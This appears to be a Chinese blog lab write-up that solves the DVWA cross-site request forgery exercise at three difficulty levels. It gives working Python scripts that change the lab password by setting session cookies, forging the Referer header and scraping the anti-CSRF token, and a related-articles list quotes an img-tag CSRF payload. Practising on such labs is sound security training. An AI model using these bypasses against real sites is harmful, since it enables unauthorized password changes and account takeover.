DVWA - CSRF (low, medium, high)

最新推荐文章于 2024-04-29 20:55:47 发布
最新推荐文章于 2024-04-29 20:55:47 发布
阅读量3.3k 收藏 2
点赞数
分类专栏: CTF 文章标签: security
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/SCNU_Jiechao/article/details/54137402
版权

low

设置一下cookie的PHPSESSID和security即可跨站请求

import requests

def main():
    url = 'http://192.168.67.22/dvwa/vulnerabilities/csrf/index.php'
    headers = {
        'Cookie': 'PHPSESSID=88airjn39jqo5mi25fnngko6f0; security=low',
    }
    new_password = 'ac'
    url = '%s?password_new=%s&password_conf=%s&Change=Change' % (url, new_password, new_password)
    res = requests.get(url, headers=headers)
    if 'Password Changed.' in res.content:
        print('Yes')
    else:
        print('No')


if __name__ == '__main__':
    main()

medium

查看源码,发现

// Checks to see where the request came from 
if( eregi( $_SERVER[ 'SERVER_NAME' ], $_SERVER[ 'HTTP_REFERER' ] ) )

根据Referer验证请求来源,绕过思路:在HTTP请求头声明Referer。

import requests


def main():
    url = 'http://192.168.67.22/dvwa/vulnerabilities/csrf/index.php'
    headers = {
        'Cookie': 'PHPSESSID=88airjn39jqo5mi25fnngko6f0; security=medium',
        'Referer': 'http://192.168.67.22/dvwa/vulnerabilities/csrf/'
    }
    new_password = 'ac'
    url = '%s?password_new=%s&password_conf=%s&Change=Change' % (url, new_password, new_password)
    res = requests.get(url, headers=headers)
    if 'Password Changed.' in res.content:
        print('Yes')
    else:
        print('No')


if __name__ == '__main__':
    main()

high

查看源码,发现多了动态user_token验证

// Check Anti-CSRF token 
checkToken( $_REQUEST[ 'user_token' ], $_SESSION[ 'session_token' ], 'index.php' );

绕过思路:在代码层面发跨站请求动态获取user_token,再发跨站请求修改密码。

import requests
import re


def main():
    url = 'http://192.168.67.22/dvwa/vulnerabilities/csrf/index.php'
    headers = {
        'Cookie': 'PHPSESSID=88airjn39jqo5mi25fnngko6f0; security=high',
        'Referer': 'http://192.168.67.22/dvwa/vulnerabilities/csrf/'       
    }
    res = requests.get(url, headers=headers)
    m = re.search(r"user_token' value='(.*?)'", res.content, re.M | re.S)
    if m:
        user_token = m.group(1)
        new_password = 'ac'
        url = '%s?password_new=%s&password_conf=%s&user_token=%s&Change=Change' % (url, new_password, new_password, user_token)
        res = requests.get(url, headers=headers)
        if 'Password Changed.' in res.content:
            print('Yes')
        else:
            print('No')
            print(res.content)


if __name__ == '__main__':
    main()

注:这3个实验要跨站,别一直都在本地同一个浏览器测试,这没意思。

jchalex
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
《WEB安全渗透测试》(12)DVWACSRF实战
午夜安全
11-11 826
《WEB安全渗透测试》(12)DVWACSRF实战 CSRF(Cross-site request forgery),跨站请求伪造,简写 CSRF/XSRF。指利用受害者尚未失效的身份认证信息(cookie、会话等),诱骗其点击恶意链接或者访问包含攻击代码的页面,在受害人不知情的情况下以受害者的身份向(身份认证信息所对应的)服务器发送请求,从而完成非法操作(如转账、改密等)。1)分析使用Burp抓包,看正常用户修改密码发送的请求。服务器端代码如下:...
Dvwa csrflowmediumhigh级别漏洞实战
永不垂头的博客
08-11 4956
Dvwa csrf低中高级别漏洞实战 Low 源代码如下: GLOBALS:引用全局作用域中可用的全部变量。GLOBALS :引用全局作用域中可用的全部变量。GLOBALS:引用全局作用域中可用的全部变量。GLOBALS 这种全局变量用于在 PHP 脚本中的任意位置访问全局变量(从函数或方法中均可)。PHP 在名为 $GLOBALS[index] 的数组中存储了所有全局变量。变量的名字就是数组的键。 从源代码可以看出这里只是对用户输入的两个密码进行判断,看是否相等。不相等就提示密码不匹配。 相等的话,查看
使用dvwa环境进行csrf漏洞练习
DXfighting_的博客
04-14 602
登录dvwa环境,并将等级设为low, 打开csrf看到一个修改密码界面 查看源代码,发现这里只对两次输入的密码是不是相同进行判断,未做任何防护 使用hackerbar发现输入的参数在url中,我们可以利用这个特点 写一个csrf.Php文件, <img src="http://127.0.0.1/DVWA-1.9/vulnerabilities/csrf/?password_new=123456&password_conf=123456&Change..
网络安全-靶机dvwa之XSS注入LowHigh详解(含代码分析)_dvwa xss注入
最新发布
2303_79055586的博客
04-29 390
外链图片转存中…(img-J1KBhZuE-1714395335186)][外链图片转存中…(img-GwLZ0Yna-1714395335186)][外链图片转存中…(img-FGdqn29T-1714395335187)][外链图片转存中…(img-4tacwhLb-1714395335188)][外链图片转存中…(img-f6UpDGGB-1714395335188)][外链图片转存中…(img-G2HmD2q2-1714395335189)]
DVWACSRF高级
m0_73896875的博客
07-11 265
(2)再次访问CSRF页面Token值发生了变化,可以确定DVWA生成Token的机制是每次不一样/页面,然后从相应中取得Token(通过正则表达式提取)取得后在将Token和新密发一起发送给。处理方式:先切换到Low级,在留言本里注入以下脚本,然后在切换到High级,直接触发改密。(High级别无法实现)(4)先构造一个Javascript原生代码发送AJAX请求的代码。(1)访问CSRF页面,在页面的源代码中可以看到生成的Token。在high级别中,屏蔽了标签,所以无法直接利用。
新手指南:DVWA-1.9全级别教程之CSRF
weixin_50464560的博客
03-19 494
目前,最新的DVWA已经更新到1.9版本(http://www.dvwa.co.uk/),而网上的教程大多停留在旧版本,并且没有针对DVWA high级别的教程,因此萌发了一个撰写新手教程的想法,错误的地方还请大家指正。DVWA简介DVWA(Damn Vulnerable Web Application)是一个用来进行安全脆弱性鉴定的PHP/MySQL Web应用,旨在为安全专业人员测试自己的专业技能和工具提供合法的环境,帮助web开发者更好的理解web应用安全防范的过程。DVWA共有十个模块,分...
DVWA-master.zip
01-04
DVWA-master.zip
DVWA-master.7z 压缩包
09-14
下载到本地,解压缩之后,重命名为DVWA,并将其放在PHPstudy的WWW目录下
DVWA-medium详解
hxhxhxhxx的博客
09-13 988
DVWA-medium详解Brute Force(暴力破解)Command injection(命令执行)Cross Site Request Forgery(CSRF跨站脚本伪造)File Inclusion(文件包含)fileupload 文件上传Insecure CAPTCHA(不安全的验证码)SQL Injection(SQL注入)SQL Injection (Blind)(SQL注入盲注)Reflected Cross Site Scripting(XSS)(反射型跨站脚本)Stored Cros
DVWA系列(五)——使用Burpsuite进行CSRF(跨站请求伪造)
weixin_45116657的博客
09-18 2033
CSRF(Cross-site request forgery) CSRF,全称Cross-site request forgery,翻译过来就是跨站请求伪造,是指利用受害者尚未失效的身份认证信息(cookie、会话等),诱骗其点击恶意链接或者访问包含攻击代码的页面,在受害人不知情的情况下以受害者的身份向(身份认证信息所对应的)服务器发送请求,从而完成非法操作(如转账、改密等)。CSRF与X...
渗透测试之DVWAMedium级别的SQL注入
追风筝的孩子
08-14 6268
Medium SQL Injection Source是通过一个下拉表的方式提交数据的。选择数据后提交,发现URL不是GET注入,是把提交的数据存放到post数据中 先把源代码放出来 &lt;?php if( isset( $_POST[ 'Submit' ] ) ) { // Get input $id = $_POST[ 'id' ]; $id = mysql_real_e...
DVWA漏洞平台学习之Medium级别
李熠专用博客_白帽子一枚,人称低危终结者
12-01 452
Medium级别,DVWA平台对每个漏洞都加入了一定程度的WAF,它不像LOW级别那样,可以轻松的利用每个漏洞。在Medium级别下,我们需要想办法绕过WAF。 我们首先改变DVWA SecurityMedium级别,然后开始对每个漏洞进行利用。 0x00 Brute Force-暴力破解 查看源码: 可以拿到,它登录失败后,增加2秒的睡眠时间,我们依然可以爆破,只是增加了爆破时间而已。 0x01 Command Injection-命令注入 0x02 CSRF-客户端请求伪造 0x03 File I
dvwa ---medium
CJB6988125的博客
07-08 381
dvwamedium Brute Force = 尝试登录成功 Command Injection = 尝试在服务器上列根目录 CSRF = 忽略它 File Inclusion = 尝试读取到服务器的密码(服务器是Linux) File Upload ...
代码审计—DVWACSRFhigh
王嘟嘟的博客
10-31 954
0x00 前言 如饥似渴的学习ing。 你可能需要看看: https://blog.csdn.net/qq_36869808/article/details/83029980 0x01 start 1.黑盒测试 发现这里带了Token。 说实话我不会利用,哈哈。直接白盒看看吧。 白盒 通过和这个来判断Token,但是这里网上都说可以通过xss来获取session来进行判断。然后进行伪造等等,但...
DVWACSRF漏洞(详细)
热门推荐
qq_44720671的博客
07-26 1万+
CSRF简介 csrf全称为:Cross-site request forgery,是一种常见的web攻击。在场景中,攻击者会伪造一个请求(通常是一个链接),然后欺骗目标用户点击,用户一旦点击,攻击也就完成了。 与xss的区别:csrf是借助用户的权限完成攻击,攻击者并没有拿到权限;而xss是直接盗取用户权限去进行破坏。 更改难度: 点击dvwa security,选择难度,然后点击submit...
新手指南:DVWA全级别教程之CSRF
g695144224的博客
08-09 2763
转自:http://www.freebuf.com/articles/web/118352.html DVWA简介DVWA(Damn Vulnerable Web Application)是一个用来进行安全脆弱性鉴定的PHP/MySQL Web应用,旨在为安全专业人员测试自己的专业技能和工具提供合法的环境,帮助web开发者更好的理解web应用安全防范的过程。DVWA共有十个模块,分别是Brute
【渗透测试】【DVWACSRF
preserphy的博客
08-07 1550
CSRF】 全称Cross-site request forgery,翻译过来就是跨站请求伪造,是指利用受害者尚未失效的身份认证信息(cookie、会话等),诱骗其点击恶意链接或者访问包含攻击代码的页面,在受害人不知情的情况下以受害者的身份向(身份认证信息所对应的)服务器发送请求,从而完成非法操作(如转账、改密等)。CSRF与XSS最大的区别就在于,CSRF并没有盗取cookie而是直接利用。...
DAY5 DVWA之SQL注入演练(low)
weixin_34315485的博客
06-01 127
1、设置 把安全等级先调整为low,让自己获得点信心,免得一来就被打脸。 2、测试和分析页面的功能这里有一个输入框 根据上面的提示,输入用户的id。然后我们输入之后,发现它返回了关于这个user的信息!这里我们输入了“1”。 它返回三行数据,一行是我们输入的用户ID。一行是用户名,另外一行是用户别名。同时,看一下浏览器的地址栏那里,发现url成这样了 这里有...
dvwa靶场csrf high
09-09
综上所述,dvwa靶场的CSRF高级关卡是一个漏洞测试场景,攻击者可以通过伪造请求来执行未经授权的操作。在该关卡中,输入密码"333333"可以成功登录。这是一个高级别的难题,主机地址为192.168.1.112。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值